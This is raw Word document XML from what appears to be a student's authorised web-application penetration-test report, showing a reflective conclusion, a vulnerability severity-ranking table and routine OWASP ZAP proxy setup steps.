      <w:r w:rsidR="00C20B39">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Regardless, this experience was valuable to my understanding of how each vulnerability can be exploited </w:t>
      </w:r>
      <w:r w:rsidR="003E0DE2">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>in a real life web application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1516AA87" w14:textId="77777777" w:rsidR="00BB32D2" w:rsidRPr="00C550AA" w:rsidRDefault="00BB32D2" w:rsidP="00BB32D2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C550AA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>I am thankful to have such an opportunity given to be able to pen-test an actual web application and conversing with the client, such experience is hard to pass-by when I am still a student with zero experience in the cybersecurity industry. The assignment allowed me to apply what I was taught within the module, such as how to gather information using the different tools, finding vulnerabilities, and exploiting those vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2198B371" w14:textId="09FF4F4B" w:rsidR="00BB32D2" w:rsidRPr="00C550AA" w:rsidRDefault="00BB32D2" w:rsidP="00BB32D2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C550AA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">I have learnt a lot of different values and technical skills from this assignment. Firstly, I </w:t>
      </w:r>
      <w:r w:rsidR="00D83731" w:rsidRPr="00C550AA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>realized</w:t>
      </w:r>
      <w:r w:rsidRPr="00C550AA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> that in the cybersecurity industry, when working with others, communication is essential. When </w:t>
      </w:r>
      <w:r w:rsidRPr="00C550AA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>communicating with the client, Mr. Erwin, I had to ensure that the queries I had were direct so that Mr. Erwin could understand easily and avoid any unnecessary miscommunication. Secondly, I learnt that no matter how secure the web application might seem to be, with perseverance, vulnerabilities will be found. When the Web Application Firewall (WAF) prevented some scans from gathering information on the web application, I wanted to give up as I thought it was impossible to find any vulnerabilities. However, with support from my team, I eventually managed to find some vulnerabilities within the web application. Lastly, the experienced gain from this assignment allowed me to explore more into pen-testing such as learning how to use the different tools available and how each vulnerability can be exploited. The technical skill learnt through this assignment cannot be fully taught from lectures but require hands on experience such as this.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A28CAF1" w14:textId="77777777" w:rsidR="00BB32D2" w:rsidRPr="00C550AA" w:rsidRDefault="00BB32D2" w:rsidP="00BB32D2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C550AA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Overall, I am grateful for the experience to conduct this pen-testing assignment, which allowed me to learn skills which are applicable in the future as a cybersecurity student.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F8EF543" w14:textId="77777777" w:rsidR="004E7849" w:rsidRPr="004E7849" w:rsidRDefault="004E7849" w:rsidP="004E7849"/>
    <w:p w14:paraId="580FDDE9" w14:textId="798AA5E4" w:rsidR="00F87A7A" w:rsidRDefault="00F87A7A">
      <w:bookmarkStart w:id="191" w:name="_Appendix_F"/>
      <w:bookmarkEnd w:id="191"/>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="67DBB1FF" w14:textId="77777777" w:rsidR="00647B3C" w:rsidRDefault="00F87A7A" w:rsidP="0003386B">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="432" w:hanging="432"/>
      </w:pPr>
      <w:bookmarkStart w:id="192" w:name="_Toc93526937"/>
      <w:bookmarkStart w:id="193" w:name="_Toc94100268"/>
      <w:bookmarkStart w:id="194" w:name="_Toc93502901"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Appendi</w:t>
      </w:r>
      <w:r w:rsidR="00647B3C">
        <w:t>ces</w:t>
      </w:r>
      <w:bookmarkEnd w:id="192"/>
      <w:bookmarkEnd w:id="193"/>
    </w:p>
    <w:p w14:paraId="47AD7199" w14:textId="05AAE50D" w:rsidR="00D94A5E" w:rsidRPr="00D94A5E" w:rsidRDefault="00911CC1" w:rsidP="00D94A5E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="195" w:name="_Severity_Ranking_Table"/>
      <w:bookmarkStart w:id="196" w:name="_Toc93526938"/>
      <w:bookmarkStart w:id="197" w:name="_Toc94100269"/>
      <w:bookmarkEnd w:id="195"/>
      <w:r>
        <w:t>Severity Ranking Table</w:t>
      </w:r>
      <w:bookmarkEnd w:id="194"/>
      <w:bookmarkEnd w:id="196"/>
      <w:bookmarkEnd w:id="197"/>
    </w:p>
    <w:p w14:paraId="2F09D965" w14:textId="77777777" w:rsidR="005D059D" w:rsidRDefault="005D059D" w:rsidP="00977D82">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="06258C4B" wp14:editId="2F17E4EF">
            <wp:extent cx="345281" cy="345281"/>
            <wp:effectExtent l="0" t="0" r="635" b="635"/>
            <wp:docPr id="73" name="image1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7.png" descr="Icon&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId168"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="345281" cy="345281"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity - Critical:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Critical vulnerabilities need swift response using mitigation controls and direct remediation. If exploited the attacker will gain higher privileges in targeted system/application and gain deeper access into other hosts or databases. If exploited these findings will cost noteworthy losses. Furthermore, critical vulnerabilities when exploited will have a significant reputational or financial harm.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E5C94A" w14:textId="00804F1F" w:rsidR="005D059D" w:rsidRDefault="005D059D" w:rsidP="00977D82">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="00CD4152" wp14:editId="5D4FA86D">
            <wp:extent cx="364331" cy="364331"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="212" name="image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2" name="image7.png" descr="Icon&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId169"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="364331" cy="364331"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Severity - High: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">High severity vulnerabilities need to be evaluated with utmost importance. Exploiting these vulnerabilities will lead to attackers gaining administrator access to system, </w:t>
      </w:r>
      <w:r w:rsidR="00911CC1">
        <w:t>application,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> or sensitive data. It will not</w:t>
      </w:r>
      <w:r w:rsidR="7EE200A3">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> however</w:t>
      </w:r>
      <w:r w:rsidR="7EE200A3">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> lead to access to other hosts or databases. If left unattended, these vulnerabilities can be </w:t>
      </w:r>
      <w:r w:rsidR="00911CC1">
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> substantial threat that could affect business continuity or cause financial harm.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3567EE4E" w14:textId="3AA13736" w:rsidR="005D059D" w:rsidRDefault="005D059D" w:rsidP="00977D82">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="53FD3BEF" wp14:editId="34F11911">
            <wp:extent cx="364331" cy="364331"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="213" name="image1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3" name="image12.png" descr="Icon&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId170"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="364331" cy="364331"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Severity - Medium: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Medium severity vulnerabilities should be </w:t>
      </w:r>
      <w:r w:rsidR="00911CC1">
        <w:t>analyzed</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and fixed within a short period of time. This kind of vulnerability can lead to attackers gaining non-privileged or user access into the system. If it can cause Denial-of-</w:t>
      </w:r>
      <w:r w:rsidR="00911CC1">
        <w:t>Service,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> it is also included in this category. The vulnerability may also be one which allows attackers to elevate their privilege level. Medium level vulnerabilities are threatening but not as much as high or critical vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2DF8AE" w14:textId="030B9F04" w:rsidR="005D059D" w:rsidRDefault="005D059D" w:rsidP="00977D82">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="205B6177" wp14:editId="6CB6E639">
            <wp:extent cx="364331" cy="364331"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="214" name="image10.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4" name="image10.png" descr="Icon&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId171"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="364331" cy="364331"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Severity - Low: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Low severity vulnerabilities should be </w:t>
      </w:r>
      <w:r w:rsidR="00911CC1">
        <w:t>analyzed</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and fixed once the </w:t>
      </w:r>
      <w:r w:rsidR="00911CC1">
        <w:t>critical, high,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and medium vulnerabilities have been fixed completely. These vulnerabilities may release information to unauthorized users to launch a more well-planned attack on the system. These vulnerabilities should be taken into consideration when creating a </w:t>
      </w:r>
      <w:r w:rsidR="00911CC1">
        <w:t>well-structured</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> security policy and should be taken note of, however they are not immediately dangerous to businesses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A5618E" w14:textId="7140B952" w:rsidR="00D94A5E" w:rsidRDefault="005D059D" w:rsidP="006B2651">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="3FAB0A4C" wp14:editId="1FB6ED8A">
            <wp:extent cx="354806" cy="354806"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="16" name="image8.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8.png" descr="Icon&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId172"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="354806" cy="354806"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Informational: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Informational means that it poses no threat to confidentiality, </w:t>
      </w:r>
      <w:r w:rsidR="00911CC1">
        <w:t>integrity,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> or availability of the system. Suggestions to improve on these would just be an add-on to the security measures that have already been implemented.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C1E0D43" w14:textId="17C6F7B5" w:rsidR="00D94A5E" w:rsidRDefault="00D94A5E" w:rsidP="0003386B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="198" w:name="_OWASP_ZAP"/>
      <w:bookmarkStart w:id="199" w:name="_Toc93526939"/>
      <w:bookmarkStart w:id="200" w:name="_Toc94100270"/>
      <w:bookmarkEnd w:id="198"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>OWASP ZAP</w:t>
      </w:r>
      <w:r w:rsidR="0092671E">
        <w:t xml:space="preserve"> Setup</w:t>
      </w:r>
      <w:bookmarkEnd w:id="199"/>
      <w:bookmarkEnd w:id="200"/>
    </w:p>
    <w:p w14:paraId="46C85B91" w14:textId="3E6D981F" w:rsidR="00402532" w:rsidRPr="00402532" w:rsidRDefault="00402532" w:rsidP="00137FD3">
      <w:r>
        <w:t>Modify the Connection Settings of the browser to use localhost (127.0.0.1) and port 8080</w:t>
      </w:r>
      <w:r w:rsidR="0073005E">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00D47191">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="0073005E">
        <w:t>default port</w:t>
      </w:r>
      <w:r>
        <w:t>. Ensure that “Also use this proxy for FTP and HTTPS” is checked as ZAP requires both HTTP and HTTPS to use localhost.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E2AE3F9" w14:textId="59E6FF7D" w:rsidR="0003386B" w:rsidRDefault="007C094F" w:rsidP="005E2537">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658261" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0DE44271" wp14:editId="7019109C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1781092</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1279359</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3265714" cy="753469"/>
                <wp:effectExtent l="0" t="0" r="11430" b="27940"/>
                <wp:wrapNone/>
                <wp:docPr id="74" name="Rectangle 74"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="3265714" cy="7534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E4E56F">
              <v:rect id="Rectangle 74" style="position:absolute;margin-left:140.25pt;margin-top:100.75pt;width:257.15pt;height:59.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6AA1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"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="006C005C" w:rsidRPr="006C005C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0E942DA5" wp14:editId="7BDA77A8">
            <wp:extent cx="5076517" cy="3479800"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="224" name="Picture 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pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId173"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5090638" cy="3489479"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="208DC37B" w14:textId="77777777" w:rsidR="007846BC" w:rsidRDefault="007846BC" w:rsidP="0003386B"/>
    <w:p w14:paraId="13413AE1" w14:textId="77777777" w:rsidR="00D22353" w:rsidRDefault="00D22353">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F58897" w14:textId="487C80BC" w:rsidR="007846BC" w:rsidRDefault="007846BC" w:rsidP="00137FD3">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Access the web application and when prompted as shown below, </w:t>
      </w:r>
      <w:r w:rsidR="00047506">
        <w:t>select</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> “Accept the Risk and Continue”</w:t>
      </w:r>
      <w:r w:rsidR="00D22353">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BFFC3B3" w14:textId="7C1E603B" w:rsidR="002064FE" w:rsidRDefault="007C094F" w:rsidP="005E2537">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658262" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="345EB4CA" wp14:editId="584488B8">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3339548</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2322636</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="874588" cy="194365"/>
                <wp:effectExtent l="0" t="0" r="20955" b="15240"/>
                <wp:wrapNone/>
                <wp:docPr id="75" name="Rectangle 75"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="874588" cy="194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57A669">
              <v:rect id="Rectangle 75" style="position:absolute;margin-left:262.95pt;margin-top:182.9pt;width:68.85pt;height:15.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6CCD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"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="002064FE" w:rsidRPr="002064FE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="64820667" wp14:editId="5F551492">
            <wp:extent cx="5943600" cy="2580640"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="225" name="Picture 2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10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId174"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2580640"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="65FAE8EB" w14:textId="77777777" w:rsidR="00D22353" w:rsidRDefault="00D22353" w:rsidP="00D22353"/>
    <w:p w14:paraId="5928D50E" w14:textId="622635D8" w:rsidR="007846BC" w:rsidRDefault="007846BC" w:rsidP="0003386B">
      <w:r>
        <w:t>Select the “+”</w:t>
      </w:r>
      <w:r w:rsidR="00047506">
        <w:t xml:space="preserve"> icon</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and</w:t>
      </w:r>
      <w:r w:rsidR="00455570">
        <w:t xml:space="preserve"> include both HTTP Sessions and Params.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44237C9F" w14:textId="5204E2DA" w:rsidR="00C34F19" w:rsidRDefault="007C094F" w:rsidP="005E2537">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="207FABED" wp14:editId="59D28C8F">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1319917</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>175260</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1093304" cy="274320"/>
                <wp:effectExtent l="0" t="0" r="12065" b="11430"/>
                <wp:wrapNone/>
                <wp:docPr id="77" name="Rectangle 77"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1093304" cy="274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3F5AE7">
              <v:rect id="Rectangle 77" style="position:absolute;margin-left:103.95pt;margin-top:13.8pt;width:86.1pt;height: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A41E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"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658263" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="14B14789" wp14:editId="15580D57">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2842122</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1630018</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="874588" cy="194365"/>
                <wp:effectExtent l="0" t="0" r="20955" b="15240"/>
                <wp:wrapNone/>
                <wp:docPr id="76" name="Rectangle 76"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="874588" cy="194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E84D77">
              <v:rect id="Rectangle 76" style="position:absolute;margin-left:223.8pt;margin-top:128.35pt;width:68.85pt;height:15.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9C81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"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00ED5D1B" w:rsidRPr="00ED5D1B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="428E798D" wp14:editId="09447477">
            <wp:extent cx="3390405" cy="2691275"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="226" name="Picture 2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 Word&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId175"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3394282" cy="2694352"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E505E87" w14:textId="77777777" w:rsidR="00C34F19" w:rsidRDefault="00C34F19" w:rsidP="0003386B"/>
    <w:p w14:paraId="063F33F2" w14:textId="77777777" w:rsidR="00D22353" w:rsidRDefault="00D22353">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="15EE9C30" w14:textId="2DA5D35B" w:rsidR="00C34F19" w:rsidRDefault="00C34F19" w:rsidP="0003386B">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Navigate to Params, locate the session cookie, right</w:t>
      </w:r>
      <w:r w:rsidR="00D47191">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00D22353">
        <w:t>click,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and select “Flag as Session Token”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D17FE04" w14:textId="5D15FEA3" w:rsidR="00317F51" w:rsidRDefault="007C094F" w:rsidP="005E2537">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658265" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2FD6A794" wp14:editId="23D72624">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2802835</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>584062</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1093304" cy="115211"/>
                <wp:effectExtent l="0" t="0" r="12065" b="18415"/>
                <wp:wrapNone/>
                <wp:docPr id="78" name="Rectangle 78"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
